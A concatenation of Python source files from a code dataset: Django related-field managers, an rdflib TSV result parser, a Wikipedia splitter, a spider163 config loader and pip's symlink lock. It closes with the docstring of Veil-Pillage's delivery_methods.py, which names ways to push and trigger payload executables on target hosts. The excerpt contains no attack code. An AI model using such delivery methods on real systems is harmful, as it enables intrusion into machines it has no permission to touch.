setattr(instance, self.field.attname, val)
# Since we already know what the related object is, seed the related
# object cache now, too. This avoids another db hit if you get the
# object you just set.
setattr(instance, self.field.get_cache_name(), value)
class ForeignRelatedObjectsDescriptor(object):
# This class provides the functionality that makes the related-object
# managers available as attributes on a model class, for fields that have
# multiple "remote" values and have a ForeignKey pointed at them by
# some other model. In the example "poll.choice_set", the choice_set
# attribute is a ForeignRelatedObjectsDescriptor instance.
def __init__(self, related):
self.related = related # RelatedObject instance
def __get__(self, instance, instance_type=None):
if instance is None:
return self
return self.create_manager(instance,
self.related.model._default_manager.__class__)
def __set__(self, instance, value):
if instance is None:
raise AttributeError("Manager must be accessed via instance")
manager = self.__get__(instance)
# If the foreign key can support nulls, then completely clear the related set.
# Otherwise, just move the named objects into the set.
if self.related.field.null:
manager.clear()
manager.add(*value)
def delete_manager(self, instance):
"""
Returns a queryset based on the related model's base manager (rather
than the default manager, as returned by __get__). Used by
Model.delete().
"""
return self.create_manager(instance,
self.related.model._base_manager.__class__)
def create_manager(self, instance, superclass):
"""
Creates the managers used by other methods (__get__() and delete()).
"""
rel_field = self.related.field
rel_model = self.related.model
class RelatedManager(superclass):
def get_query_set(self):
db = self._db or router.db_for_read(rel_model, instance=instance)
return superclass.get_query_set(self).using(db).filter(**(self.core_filters))
def add(self, *objs):
for obj in objs:
if not isinstance(obj, self.model):
raise TypeError("'%s' instance expected" % self.model._meta.object_name)
setattr(obj, rel_field.name, instance)
obj.save()
add.alters_data = True
def create(self, **kwargs):
kwargs.update({rel_field.name: instance})
db = router.db_for_write(rel_model, instance=instance)
return super(RelatedManager, self.db_manager(db)).create(**kwargs)
create.alters_data = True
def get_or_create(self, **kwargs):
# Update kwargs with the related object that this
# ForeignRelatedObjectsDescriptor knows about.
kwargs.update({rel_field.name: instance})
db = router.db_for_write(rel_model, instance=instance)
return super(RelatedManager, self.db_manager(db)).get_or_create(**kwargs)
get_or_create.alters_data = True
# remove() and clear() are only provided if the ForeignKey can have a value of null.
if rel_field.null:
def remove(self, *objs):
val = getattr(instance, rel_field.rel.get_related_field().attname)
for obj in objs:
# Is obj actually part of this descriptor set?
if getattr(obj, rel_field.attname) == val:
setattr(obj, rel_field.name, None)
obj.save()
else:
raise rel_field.rel.to.DoesNotExist("%r is not related to %r." % (obj, instance))
remove.alters_data = True
def clear(self):
for obj in self.all():
setattr(obj, rel_field.name, None)
obj.save()
clear.alters_data = True
manager = RelatedManager()
attname = rel_field.rel.get_related_field().name
manager.core_filters = {'%s__%s' % (rel_field.name, attname):
getattr(instance, attname)}
manager.model = self.related.model
return manager
def create_many_related_manager(superclass, rel=False):
"""Creates a manager that subclasses 'superclass' (which is a Manager)
and adds behavior for many-to-many related objects."""
through = rel.through
class ManyRelatedManager(superclass):
def __init__(self, model=None, core_filters=None, instance=None, symmetrical=None,
join_table=None, source_field_name=None, target_field_name=None,
reverse=False):
super(ManyRelatedManager, self).__init__()
self.core_filters = core_filters
self.model = model
self.symmetrical = symmetrical
self.instance = instance
self.source_field_name = source_field_name
self.target_field_name = target_field_name
self.through = through
self._pk_val = self.instance.pk
self.reverse = reverse
if self._pk_val is None:
raise ValueError("%r instance needs to have a primary key value before a many-to-many relationship can be used." % instance.__class__.__name__)
def get_query_set(self):
db = self._db or router.db_for_read(self.instance.__class__, instance=self.instance)
return superclass.get_query_set(self).using(db)._next_is_sticky().filter(**(self.core_filters))
# If the ManyToMany relation has an intermediary model,
# the add and remove methods do not exist.
if rel.through._meta.auto_created:
def add(self, *objs):
self._add_items(self.source_field_name, self.target_field_name, *objs)
# If this is a symmetrical m2m relation to self, add the mirror entry in the m2m table
if self.symmetrical:
self._add_items(self.target_field_name, self.source_field_name, *objs)
add.alters_data = True
def remove(self, *objs):
self._remove_items(self.source_field_name, self.target_field_name, *objs)
# If this is a symmetrical m2m relation to self, remove the mirror entry in the m2m table
if self.symmetrical:
self._remove_items(self.target_field_name, self.source_field_name, *objs)
remove.alters_data = True
def clear(self):
self._clear_items(self.source_field_name)
# If this is a symmetrical m2m relation to self, clear the mirror entry in the m2m table
if self.symmetrical:
self._clear_items(self.target_field_name)
clear.alters_data = True
def create(self, **kwargs):
# This check needs to be done here, since we can't later remove this
# from the method lookup table, as we do with add and remove.
if not rel.through._meta.auto_created:
opts = through._meta
raise AttributeError("Cannot use create() on a ManyToManyField which specifies an intermediary model. Use %s.%s's Manager instead." % (opts.app_label, opts.object_name))
db = router.db_for_write(self.instance.__class__, instance=self.instance)
new_obj = super(ManyRelatedManager, self.db_manager(db)).create(**kwargs)
self.add(new_obj)
return new_obj
create.alters_data = True
def get_or_create(self, **kwargs):
db = router.db_for_write(self.instance.__class__, instance=self.instance)
obj, created = \
super(ManyRelatedManager, self.db_manager(db)).get_or_create(**kwargs)
# We only need to add() if created because if we got an object back
# from get() then the relationship already exists.
if created:
self.add(obj)
return obj, created
get_or_create.alters_data = True
def _add_items(self, source_field_name, target_field_name, *objs):
# join_table: name of the m2m link table
# source_field_name: the PK fieldname in join_table for the source object
# target_field_name: the PK fieldname in join_table for the target object
# *objs - objects to add. Either object instances, or primary keys of object instances.
# If there aren't any objects, there is nothing to do.
from django.db.models import Model
if objs:
new_ids = set()
for obj in objs:
if isinstance(obj, self.model):
if not router.allow_relation(obj, self.instance):
raise ValueError('Cannot add "%r": instance is on database "%s", value is on database "%s"' %
(obj, self.instance._state.db, obj._state.db))
new_ids.add(obj.pk)
elif isinstance(obj, Model):
raise TypeError("'%s' instance expected" % self.model._meta.object_name)
else:
new_ids.add(obj)
db = router.db_for_write(self.through, instance=self.instance)
vals = self.through._default_manager.using(db).values_list(target_field_name, flat=True)
vals = vals.filter(**{
source_field_name: self._pk_val,
'%s__in' % target_field_name: new_ids,
})
new_ids = new_ids - set(vals)
if self.reverse or source_field_name == self.source_field_name:
# Don't send the signal when we are inserting the
# duplicate data row for symmetrical reverse entries.
signals.m2m_changed.send(sender=rel.through, action='pre_add',
instance=self.instance, reverse=self.reverse,
model=self.model, pk_set=new_ids, using=db)
# Add the ones that aren't there already
for obj_id in new_ids:
self.through._default_manager.using(db).create(**{
'%s_id' % source_field_name: self._pk_val,
'%s_id' % target_field_name: obj_id,
})
if self.reverse or source_field_name == self.source_field_name:
# Don't send the signal when we are inserting the
# duplicate data row for symmetrical reverse entries.
signals.m2m_changed.send(sender=rel.through, action='post_add',
instance=self.instance, reverse=self.reverse,
model=self.model, pk_set=new_ids, using=db)
def _remove_items(self, source_field_name, target_field_name, *objs):
# source_col_name: the PK colname in join_table for the source object
# target_col_name: the PK colname in join_table for the target object
# *objs - objects to remove
# If there aren't any objects, there is nothing to do.
if objs:
# Check that all the objects are of the right type
old_ids = set()
for obj in objs:
if isinstance(obj, self.model):
old_ids.add(obj.pk)
else:
old_ids.add(obj)
# Work out what DB we're operating on
db = router.db_for_write(self.through, instance=self.instance)
# Send a signal to the other end if need be.
if self.reverse or source_field_name == self.source_field_name:
# Don't send the signal when we are deleting the
# duplicate data row for symmetrical reverse entries.
signals.m2m_changed.send(sender=rel.through, action="pre_remove",
instance=self.instance, reverse=self.reverse,
model=self.model, pk_set=old_ids, using=db)
# Remove the specified objects from the join table
self.through._default_manager.using(db).filter(**{
source_field_name: self._pk_val,
'%s__in' % target_field_name: old_ids
}).delete()
if self.reverse or source_field_name == self.source_field_name:
# Don't send the signal when we are deleting the
# duplicate data row for symmetrical reverse entries.
signals.m2m_changed.send(sender=rel.through, action="post_remove",
instance=self.instance, reverse=self.reverse,
model=self.model, pk_set=old_ids, using=db)
def _clear_items(self, source_field_name):
db = router.db_for_write(self.through, instance=self.instance)
# source_col_name: the PK colname in join_table for the source object
if self.reverse or source_field_name == self.source_field_name:
# Don't send the signal when we are clearing the
# duplicate data rows for symmetrical reverse entries.
signals.m2m_changed.send(sender=rel.through, action="pre_clear",
instance=self.instance, reverse=self.reverse,
model=self.model, pk_set=None, using=db)
self.through._default_manager.using(db).filter(**{
source_field_name: self._pk_val
}).delete()
if self.reverse or source_field_name == self.source_field_name:
# Don't send the signal when we are clearing the
# duplicate data rows for symmetrical reverse entries.
signals.m2m_changed.send(sender=rel.through, action="post_clear",
instance=self.instance, reverse=self.reverse,
model=self.model, pk_set=None, using=db)
return ManyRelatedManager
class ManyRelatedObjectsDescriptor(object):
# This class provides the functionality that makes the related-object
# managers available as attributes on a model class, for fields that have
# multiple "remote" values and have a ManyToManyField pointed at them by
# some other model (rather than having a ManyToManyField themselves).
# In the example "publication.article_set", the article_set attribute is a
# ManyRelatedObjectsDescriptor instance.
def __init__(self, related):
self.related = related # RelatedObject instance
def __get__(self, instance, instance_type=None):
if instance is None:
return self
# Dynamically create a class that subclasses the related
# model's default manager.
rel_model = self.related.model
superclass = rel_model._default_manager.__class__
RelatedManager = create_many_related_manager(superclass, self.related.field.rel)
manager = RelatedManager(
model=rel_model,
core_filters={'%s__pk' % self.related.field.name: instance._get_pk_val()},
instance=instance,
symmetrical=False,
source_field_name=self.related.field.m2m_reverse_field_name(),
target_field_name=self.related.field.m2m_field_name(),
reverse=True
)
return manager
def __set__(self, instance, value):
if instance is None:
raise AttributeError("Manager must be accessed via instance")
if not self.related.field.rel.through._meta.auto_created:
opts = self.related.field.rel.through._meta
raise AttributeError("Cannot set values on a ManyToManyField which specifies an intermediary model. Use %s.%s's Manager instead." % (opts.app_label, opts.object_name))
manager = self.__get__(instance)
manager.clear()
manager.add(*value)
class ReverseManyRelatedObjectsDescriptor(object):
# This class provides the functionality that makes the related-object
# managers available as attributes on a model class, for fields that have
# multiple "remote" values and have a ManyToManyField defined in their
# model (rather than having another model pointed *at* them).
# In the example "article.publications", the publications attribute is a
# ReverseManyRelatedObjectsDescriptor instance.
def __init__(self, m2m_field):
self.field = m2m_field
def _through(self):
# through is provided so that you have easy access to the through
# model (Book.authors.through) for inlines, etc. This is done as
# a property to ensure that the fully resolved value is returned.
return self.field.rel.through
through = property(_through)
def __get__(self, instance, instance_type=None):
if instance is None:
return self
# Dynamically create a class that subclasses the related
# model's default manager.
rel_model=self.field.rel.to
superclass = rel_model._default_manager.__class__
RelatedManager = create_many_related_manager(superclass, self.field.rel)
manager = RelatedManager(
model=rel_model,
core_filters={'%s__pk' % self.field.related_query_name(): instance._get_pk_val()},
instance=instance,
symmetrical=self.field.rel.symmetrical,
source_field_name=self.field.m2m_field_name(),
target_field_name=self.field.m2m_reverse_field_name(),
reverse=False
)
return manager
def __set__(self, instance, value):
if instance is None:
raise AttributeError("Manager must be accessed via instance")
if not self.field.rel.through._meta.auto_created:
opts = self.field.rel.through._meta
raise AttributeError("Cannot set values on a ManyToManyField which specifies an intermediary model. Use %s.%s's Manager instead." % (opts.app_label, opts.object_name))
manager = self.__get__(instance)
manager.clear()
manager.add(*value)
class ManyToOneRel(object):
def __init__(self, to, field_name, related_name=None, limit_choices_to=None,
parent_link=False, on_delete=None):
try:
to._meta
except AttributeError: # to._meta doesn't exist, so it must be RECURSIVE_RELATIONSHIP_CONSTANT
assert isinstance(to, basestring), "'to' must be either a model, a model name or the string %r" % RECURSIVE_RELATIONSHIP_CONSTANT
self.to, self.field_name = to, field_name
self.related_name = related_name
if limit_choices_to is None:
limit_choices_to = {}
self.limit_choices_to = limit_choices_to
self.multiple = True
self.parent_link = parent_link
self.on_delete = on_delete
def is_hidden(self):
"Should the related object be hidden?"
return self.related_name and self.related_name[-1] == '+'
def get_related_field(self):
"""
Returns the Field in the 'to' object to which this relationship is
tied.
"""
data = self.to._meta.get_field_by_name(self.field_name)
if not data[2]:
raise FieldDoesNotExist("No related field named '%s'" %
self.field_name)
return data[0]
class OneToOneRel(ManyToOneRel):
def __init__(self, to, field_name, related_name=None, limit_choices_to=None,
parent_link=False, on_delete=None):
super(OneToOneRel, self).__init__(to, field_name,
related_name=related_name, limit_choices_to=limit_choices_to,
parent_link=parent_link, on_delete=on_delete
)
self.multiple = False
class ManyToManyRel(object):
def __init__(self, to, related_name=None, limit_choices_to=None,
symmetrical=True, through=None):
self.to = to
self.related_name = related_name
if limit_choices_to is None:
limit_choices_to = {}
self.limit_choices_to = limit_choices_to
self.symmetrical = symmetrical
self.multiple = True
self.through = through
def is_hidden(self):
"Should the related object be hidden?"
return self.related_name and self.related_name[-1] == '+'
def get_related_field(self):
"""
Returns the field in the to' object to which this relationship is tied
(this is always the primary key on the target model). Provided for
symmetry with ManyToOneRel.
"""
return self.to._meta.pk
class ForeignKey(RelatedField, Field):
empty_strings_allowed = False
default_error_messages = {
'invalid': _('Model %(model)s with pk %(pk)r does not exist.')
}
description = _("Foreign Key (type determined by related field)")
def __init__(self, to, to_field=None, rel_class=ManyToOneRel, **kwargs):
try:
to_name = to._meta.object_name.lower()
except AttributeError: # to._meta doesn't exist, so it must be RECURSIVE_RELATIONSHIP_CONSTANT
assert isinstance(to, basestring), "%s(%r) is invalid. First parameter to ForeignKey must be either a model, a model name, or the string %r" % (self.__class__.__name__, to, RECURSIVE_RELATIONSHIP_CONSTANT)
else:
assert not to._meta.abstract, "%s cannot define a relation with abstract class %s" % (self.__class__.__name__, to._meta.object_name)
# For backwards compatibility purposes, we need to *try* and set
# the to_field during FK construction. It won't be guaranteed to
# be correct until contribute_to_class is called. Refs #12190.
to_field = to_field or (to._meta.pk and to._meta.pk.name)
kwargs['verbose_name'] = kwargs.get('verbose_name', None)
if 'db_index' not in kwargs:
kwargs['db_index'] = True
kwargs['rel'] = rel_class(to, to_field,
related_name=kwargs.pop('related_name', None),
limit_choices_to=kwargs.pop('limit_choices_to', None),
parent_link=kwargs.pop('parent_link', False),
on_delete=kwargs.pop('on_delete', CASCADE),
)
Field.__init__(self, **kwargs)
def validate(self, value, model_instance):
if self.rel.parent_link:
return
super(ForeignKey, self).validate(value, model_instance)
if value is None:
return
using = router.db_for_read(model_instance.__class__, instance=model_instance)
qs = self.rel.to._default_manager.using(using).filter(
**{self.rel.field_name: value}
)
qs = qs.complex_filter(self.rel.limit_choices_to)
if not qs.exists():
raise exceptions.ValidationError(self.error_messages['invalid'] % {
'model': self.rel.to._meta.verbose_name, 'pk': value})
def get_attname(self):
return '%s_id' % self.name
def get_validator_unique_lookup_type(self):
return '%s__%s__exact' % (self.name, self.rel.get_related_field().name)
def get_default(self):
"Here we check if the default value is an object and return the to_field if so."
field_default = super(ForeignKey, self).get_default()
if isinstance(field_default, self.rel.to):
return getattr(field_default, self.rel.get_related_field().attname)
return field_default
def get_db_prep_save(self, value, connection):
if value == '' or value == None:
return None
else:
return self.rel.get_related_field().get_db_prep_save(value,
connection=connections[router.db_for_read(self.rel.to)])
def value_to_string(self, obj):
if not obj:
# In required many-to-one fields with only one available choice,
# select that one available choice. Note: For SelectFields
# we have to check that the length of choices is *2*, not 1,
# because SelectFields always have an initial "blank" value.
if not self.blank and self.choices:
choice_list = self.get_choices_default()
if len(choice_list) == 2:
return smart_unicode(choice_list[1][0])
return Field.value_to_string(self, obj)
def contribute_to_class(self, cls, name):
super(ForeignKey, self).contribute_to_class(cls, name)
setattr(cls, self.name, ReverseSingleRelatedObjectDescriptor(self))
if isinstance(self.rel.to, basestring):
target = self.rel.to
else:
target = self.rel.to._meta.db_table
cls._meta.duplicate_targets[self.column] = (target, "o2m")
def contribute_to_related_class(self, cls, related):
# Internal FK's - i.e., those with a related name ending with '+' -
# don't get a related descriptor.
if not self.rel.is_hidden():
setattr(cls, related.get_accessor_name(), ForeignRelatedObjectsDescriptor(related))
if self.rel.limit_choices_to:
cls._meta.related_fkey_lookups.append(self.rel.limit_choices_to)
if self.rel.field_name is None:
self.rel.field_name = cls._meta.pk.name
def formfield(self, **kwargs):
db = kwargs.pop('using', None)
defaults = {
'form_class': forms.ModelChoiceField,
'queryset': self.rel.to._default_manager.using(db).complex_filter(self.rel.limit_choices_to),
'to_field_name': self.rel.field_name,
}
defaults.update(kwargs)
return super(ForeignKey, self).formfield(**defaults)
def db_type(self, connection):
# The database column type of a ForeignKey is the column type
# of the field to which it points. An exception is if the ForeignKey
# points to an AutoField/PositiveIntegerField/PositiveSmallIntegerField,
# in which case the column type is simply that of an IntegerField.
# If the database needs similar types for key fields however, the only
# thing we can do is making AutoField an IntegerField.
rel_field = self.rel.get_related_field()
return rel_field.related_db_type(connection=connections[router.db_for_read(rel_field.model)])
class OneToOneField(ForeignKey):
"""
A OneToOneField is essentially the same as a ForeignKey, with the exception
that always carries a "unique" constraint with it and the reverse relation
always returns the object pointed to (since there will only ever be one),
rather than returning a list.
"""
description = _("One-to-one relationship")
def __init__(self, to, to_field=None, **kwargs):
kwargs['unique'] = True
super(OneToOneField, self).__init__(to, to_field, OneToOneRel, **kwargs)
def contribute_to_related_class(self, cls, related):
setattr(cls, related.get_accessor_name(),
SingleRelatedObjectDescriptor(related))
def formfield(self, **kwargs):
if self.rel.parent_link:
return None
return super(OneToOneField, self).formfield(**kwargs)
def save_form_data(self, instance, data):
if isinstance(data, self.rel.to):
setattr(instance, self.name, data)
else:
setattr(instance, self.attname, data)
def create_many_to_many_intermediary_model(field, klass):
from django.db import models
managed = True
if isinstance(field.rel.to, basestring) and field.rel.to != RECURSIVE_RELATIONSHIP_CONSTANT:
to_model = field.rel.to
to = to_model.split('.')[-1]
def set_managed(field, model, cls):
field.rel.through._meta.managed = model._meta.managed or cls._meta.managed
add_lazy_relation(klass, field, to_model, set_managed)
elif isinstance(field.rel.to, basestring):
to = klass._meta.object_name
to_model = klass
managed = klass._meta.managed
else:
to = field.rel.to._meta.object_name
to_model = field.rel.to
managed = klass._meta.managed or to_model._meta.managed
name = '%s_%s' % (klass._meta.object_name, field.name)
if field.rel.to == RECURSIVE_RELATIONSHIP_CONSTANT or to == klass._meta.object_name:
from_ = 'from_%s' % to.lower()
to = 'to_%s' % to.lower()
else:
from_ = klass._meta.object_name.lower()
to = to.lower()
meta = type('Meta', (object,), {
'db_table': field._get_m2m_db_table(klass._meta),
'managed': managed,
'auto_created': klass,
'app_label': klass._meta.app_label,
'unique_together': (from_, to),
'verbose_name': '%(from)s-%(to)s relationship' % {'from': from_, 'to': to},
'verbose_name_plural': '%(from)s-%(to)s relationships' % {'from': from_, 'to': to},
})
# Construct and return the new class.
return type(name, (models.Model,), {
'Meta': meta,
'__module__': klass.__module__,
from_: models.ForeignKey(klass, related_name='%s+' % name),
to: models.ForeignKey(to_model, related_name='%s+' % name)
})
class ManyToManyField(RelatedField, Field):
description = _("Many-to-many relationship")
def __init__(self, to, **kwargs):
try:
assert not to._meta.abstract, "%s cannot define a relation with abstract class %s" % (self.__class__.__name__, to._meta.object_name)
except AttributeError: # to._meta doesn't exist, so it must be RECURSIVE_RELATIONSHIP_CONSTANT
assert isinstance(to, basestring), "%s(%r) is invalid. First parameter to ManyToManyField must be either a model, a model name, or the string %r" % (self.__class__.__name__, to, RECURSIVE_RELATIONSHIP_CONSTANT)
kwargs['verbose_name'] = kwargs.get('verbose_name', None)
kwargs['rel'] = ManyToManyRel(to,
related_name=kwargs.pop('related_name', None),
limit_choices_to=kwargs.pop('limit_choices_to', None),
symmetrical=kwargs.pop('symmetrical', to==RECURSIVE_RELATIONSHIP_CONSTANT),
through=kwargs.pop('through', None))
self.db_table = kwargs.pop('db_table', None)
if kwargs['rel'].through is not None:
assert self.db_table is None, "Cannot specify a db_table if an intermediary model is used."
Field.__init__(self, **kwargs)
msg = _('Hold down "Control", or "Command" on a Mac, to select more than one.')
self.help_text = string_concat(self.help_text, ' ', msg)
def get_choices_default(self):
return Field.get_choices(self, include_blank=False)
def _get_m2m_db_table(self, opts):
"Function that can be curried to provide the m2m table name for this relation"
if self.rel.through is not None:
return self.rel.through._meta.db_table
elif self.db_table:
return self.db_table
else:
return util.truncate_name('%s_%s' % (opts.db_table, self.name),
connection.ops.max_name_length())
def _get_m2m_attr(self, related, attr):
"Function that can be curried to provide the source accessor or DB column name for the m2m table"
cache_attr = '_m2m_%s_cache' % attr
if hasattr(self, cache_attr):
return getattr(self, cache_attr)
for f in self.rel.through._meta.fields:
if hasattr(f,'rel') and f.rel and f.rel.to == related.model:
setattr(self, cache_attr, getattr(f, attr))
return getattr(self, cache_attr)
def _get_m2m_reverse_attr(self, related, attr):
"Function that can be curried to provide the related accessor or DB column name for the m2m table"
cache_attr = '_m2m_reverse_%s_cache' % attr
if hasattr(self, cache_attr):
return getattr(self, cache_attr)
found = False
for f in self.rel.through._meta.fields:
if hasattr(f,'rel') and f.rel and f.rel.to == related.parent_model:
if related.model == related.parent_model:
# If this is an m2m-intermediate to self,
# the first foreign key you find will be
# the source column. Keep searching for
# the second foreign key.
if found:
setattr(self, cache_attr, getattr(f, attr))
break
else:
found = True
else:
setattr(self, cache_attr, getattr(f, attr))
break
return getattr(self, cache_attr)
def value_to_string(self, obj):
data = ''
if obj:
qs = getattr(obj, self.name).all()
data = [instance._get_pk_val() for instance in qs]
else:
# In required many-to-many fields with only one available choice,
# select that one available choice.
if not self.blank:
choices_list = self.get_choices_default()
if len(choices_list) == 1:
data = [choices_list[0][0]]
return smart_unicode(data)
def contribute_to_class(self, cls, name):
# To support multiple relations to self, it's useful to have a non-None
# related name on symmetrical relations for internal reasons. The
# concept doesn't make a lot of sense externally ("you want me to
# specify *what* on my non-reversible relation?!"), so we set it up
# automatically. The funky name reduces the chance of an accidental
# clash.
if self.rel.symmetrical and (self.rel.to == "self" or self.rel.to == cls._meta.object_name):
self.rel.related_name = "%s_rel_+" % name
super(ManyToManyField, self).contribute_to_class(cls, name)
# The intermediate m2m model is not auto created if:
# 1) There is a manually specified intermediate, or
# 2) The class owning the m2m field is abstract.
if not self.rel.through and not cls._meta.abstract:
self.rel.through = create_many_to_many_intermediary_model(self, cls)
# Add the descriptor for the m2m relation
setattr(cls, self.name, ReverseManyRelatedObjectsDescriptor(self))
# Set up the accessor for the m2m table name for the relation
self.m2m_db_table = curry(self._get_m2m_db_table, cls._meta)
# Populate some necessary rel arguments so that cross-app relations
# work correctly.
if isinstance(self.rel.through, basestring):
def resolve_through_model(field, model, cls):
field.rel.through = model
add_lazy_relation(cls, self, self.rel.through, resolve_through_model)
if isinstance(self.rel.to, basestring):
target = self.rel.to
else:
target = self.rel.to._meta.db_table
cls._meta.duplicate_targets[self.column] = (target, "m2m")
def contribute_to_related_class(self, cls, related):
# Internal M2Ms (i.e., those with a related name ending with '+')
# don't get a related descriptor.
if not self.rel.is_hidden():
setattr(cls, related.get_accessor_name(), ManyRelatedObjectsDescriptor(related))
# Set up the accessors for the column names on the m2m table
self.m2m_column_name = curry(self._get_m2m_attr, related, 'column')
self.m2m_reverse_name = curry(self._get_m2m_reverse_attr, related, 'column')
self.m2m_field_name = curry(self._get_m2m_attr, related, 'name')
self.m2m_reverse_field_name = curry(self._get_m2m_reverse_attr, related, 'name')
get_m2m_rel = curry(self._get_m2m_attr, related, 'rel')
self.m2m_target_field_name = lambda: get_m2m_rel().field_name
get_m2m_reverse_rel = curry(self._get_m2m_reverse_attr, related, 'rel')
self.m2m_reverse_target_field_name = lambda: get_m2m_reverse_rel().field_name
def set_attributes_from_rel(self):
pass
def value_from_object(self, obj):
"Returns the value of this field in the given model instance."
return getattr(obj, self.attname).all()
def save_form_data(self, instance, data):
setattr(instance, self.attname, data)
def formfield(self, **kwargs):
db = kwargs.pop('using', None)
defaults = {
'form_class': forms.ModelMultipleChoiceField,
'queryset': self.rel.to._default_manager.using(db).complex_filter(self.rel.limit_choices_to)
}
defaults.update(kwargs)
# If initial is passed in, it's a list of related objects, but the
# MultipleChoiceField takes a list of IDs.
if defaults.get('initial') is not None:
initial = defaults['initial']
if callable(initial):
initial = initial()
defaults['initial'] = [i._get_pk_val() for i in initial]
return super(ManyToManyField, self).formfield(**defaults)
def db_type(self, connection):
# A ManyToManyField is not represented by a single column,
# so return None.
return None
|
lrowe/rdflib | refs/heads/master | rdflib/plugins/sparql/results/tsvresults.py | 16 |
"""
This implements the Tab Separated SPARQL Result Format
It is implemented with pyparsing, reusing the elements from the SPARQL Parser
"""
import codecs
from pyparsing import (
Optional, ZeroOrMore, Literal, ParserElement, ParseException, Suppress,
FollowedBy, LineEnd)
from rdflib.query import Result, ResultParser
from rdflib.plugins.sparql.parser import (
Var, STRING_LITERAL1, STRING_LITERAL2, IRIREF, BLANK_NODE_LABEL,
NumericLiteral, BooleanLiteral, LANGTAG)
from rdflib.plugins.sparql.parserutils import Comp, Param, CompValue
from rdflib import Literal as RDFLiteral
from rdflib.py3compat import bytestype
ParserElement.setDefaultWhitespaceChars(" \n")
String = STRING_LITERAL1 | STRING_LITERAL2
RDFLITERAL = Comp('literal', Param('string', String) + Optional(
Param('lang', LANGTAG.leaveWhitespace()
) | Literal('^^').leaveWhitespace(
) + Param('datatype', IRIREF).leaveWhitespace()))
NONE_VALUE = object()
EMPTY = FollowedBy(LineEnd()) | FollowedBy("\t")
EMPTY.setParseAction(lambda x: NONE_VALUE)
TERM = RDFLITERAL | IRIREF | BLANK_NODE_LABEL | NumericLiteral | BooleanLiteral
ROW = (EMPTY | TERM) + ZeroOrMore(Suppress("\t") + (EMPTY | TERM))
ROW.parseWithTabs()
HEADER = Var + ZeroOrMore(Suppress("\t") + Var)
HEADER.parseWithTabs()
class TSVResultParser(ResultParser):
def parse(self, source):
if isinstance(source.read(0), bytestype):
# if reading from source returns bytes do utf-8 decoding
source = codecs.getreader('utf-8')(source)
try:
r = Result('SELECT')
header = source.readline()
r.vars = list(HEADER.parseString(header.strip(), parseAll=True))
r.bindings = []
while True:
line = source.readline()
if not line:
break
line = line.strip('\n')
if line == "":
continue
row = ROW.parseString(line, parseAll=True)
r.bindings.append(
dict(zip(r.vars, (self.convertTerm(x) for x in row))))
return r
except ParseException, err:
print err.line
print " " * (err.column - 1) + "^"
print err
def convertTerm(self, t):
if t is NONE_VALUE:
return None
if isinstance(t, CompValue):
if t.name == 'literal':
return RDFLiteral(t.string, lang=t.lang, datatype=t.datatype)
else:
raise Exception("I dont know how to handle this: %s" % (t,))
else:
return t
if __name__ == '__main__':
import sys
r = Result.parse(file(sys.argv[1]), format='tsv')
print r.vars
print r.bindings
# print r.serialize(format='json')
|
mmuggli/doppelganger | refs/heads/master | utils/split_wikipedia.py | 6 | #! /usr/bin/env python
# -*- coding: iso-8859-15 -*-
import getopt, sys
def main():
if len(sys.argv) < 4:
return
sequences = 0
in_sequence = False
part_size = 1048576 * int(sys.argv[2])
current_file = 1
print "Part size:", part_size
print
if sys.argv[1] == "-":
infile = sys.stdin
else:
infile = open(sys.argv[1], "r")
partname = "part"
start_tag = "<" + sys.argv[3] + ">"
end_tag = "</" + sys.argv[3] + ">"
output = open(partname + "." + str(current_file), "wb")
print "Writing part", output.name, "..."
for line in infile:
if in_sequence:
if line.find(end_tag) >= 0:
output.write("\0")
in_sequence = False
else:
output.write(line)
else:
if line.find(start_tag) >= 0:
if output.tell() >= part_size:
output.close()
current_file += 1
output = open(partname + "." + str(current_file), "wb")
print "Writing part", output.name, "..."
in_sequence = True
sequences += 1
infile.close()
output.close()
print
print "Sequences: ", sequences
if __name__ == "__main__":
main()
|
AntoineLee/spider163 | refs/heads/master | spider163/utils/config.py | 1 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import ConfigParser
import os
import re
PATH = os.environ.get("HOME") + "/spider163"
if os.environ.get("SPIDER163_PATH") is not None:
PATH = os.environ.get("SPIDER163_PATH")
if not os.path.exists(PATH):
os.makedirs(PATH)
if not os.path.exists(PATH + "/spider163.conf"):
print("请在默认路径 " + PATH + " 下增加配置文件 spider.conf 格式参照官方")
os._exit(-1)
cf = ConfigParser.ConfigParser()
cf.read(PATH + "/spider163.conf")
def get_path():
return PATH
def get_db():
return cf.get("core", "db")
def get_mysql():
link = get_db()
db = re.search('(?<=/)[^/]+(?=\?)', link).group(0)
uri = re.search('.*(?=/)', link).group(0)
return {"db": db, "uri": uri}
def get_port():
return cf.get("core", "port")
|
ianmabie/uberpy | refs/heads/master | venv/lib/python2.7/site-packages/pip/_vendor/lockfile/symlinklockfile.py | 487 | from __future__ import absolute_import
import time
import os
from . import (LockBase, LockFailed, NotLocked, NotMyLock, LockTimeout,
AlreadyLocked)
class SymlinkLockFile(LockBase):
"""Lock access to a file using symlink(2)."""
def __init__(self, path, threaded=True, timeout=None):
# super(SymlinkLockFile).__init(...)
LockBase.__init__(self, path, threaded, timeout)
# split it back!
self.unique_name = os.path.split(self.unique_name)[1]
def acquire(self, timeout=None):
# Hopefully unnecessary for symlink.
#try:
# open(self.unique_name, "wb").close()
#except IOError:
# raise LockFailed("failed to create %s" % self.unique_name)
timeout = timeout is not None and timeout or self.timeout
end_time = time.time()
if timeout is not None and timeout > 0:
end_time += timeout
while True:
# Try and create a symbolic link to it.
try:
os.symlink(self.unique_name, self.lock_file)
except OSError:
# Link creation failed. Maybe we've double-locked?
if self.i_am_locking():
# Linked to out unique name. Proceed.
return
else:
# Otherwise the lock creation failed.
if timeout is not None and time.time() > end_time:
if timeout > 0:
raise LockTimeout("Timeout waiting to acquire"
" lock for %s" %
self.path)
else:
raise AlreadyLocked("%s is already locked" %
self.path)
time.sleep(timeout/10 if timeout is not None else 0.1)
else:
# Link creation succeeded. We're good to go.
return
def release(self):
if not self.is_locked():
raise NotLocked("%s is not locked" % self.path)
elif not self.i_am_locking():
raise NotMyLock("%s is locked, but not by me" % self.path)
os.unlink(self.lock_file)
def is_locked(self):
return os.path.islink(self.lock_file)
def i_am_locking(self):
return os.path.islink(self.lock_file) and \
os.readlink(self.lock_file) == self.unique_name
def break_lock(self):
if os.path.islink(self.lock_file): # exists && link
os.unlink(self.lock_file)
|
jorik041/Veil-Pillage | refs/heads/master | lib/delivery_methods.py | 4 | """
Payload-delivery methods.
Includes:
hostTrigger() - host an EXE and trigger it by UNC on a target
uploadTrigger() - upload and trigger and EXE
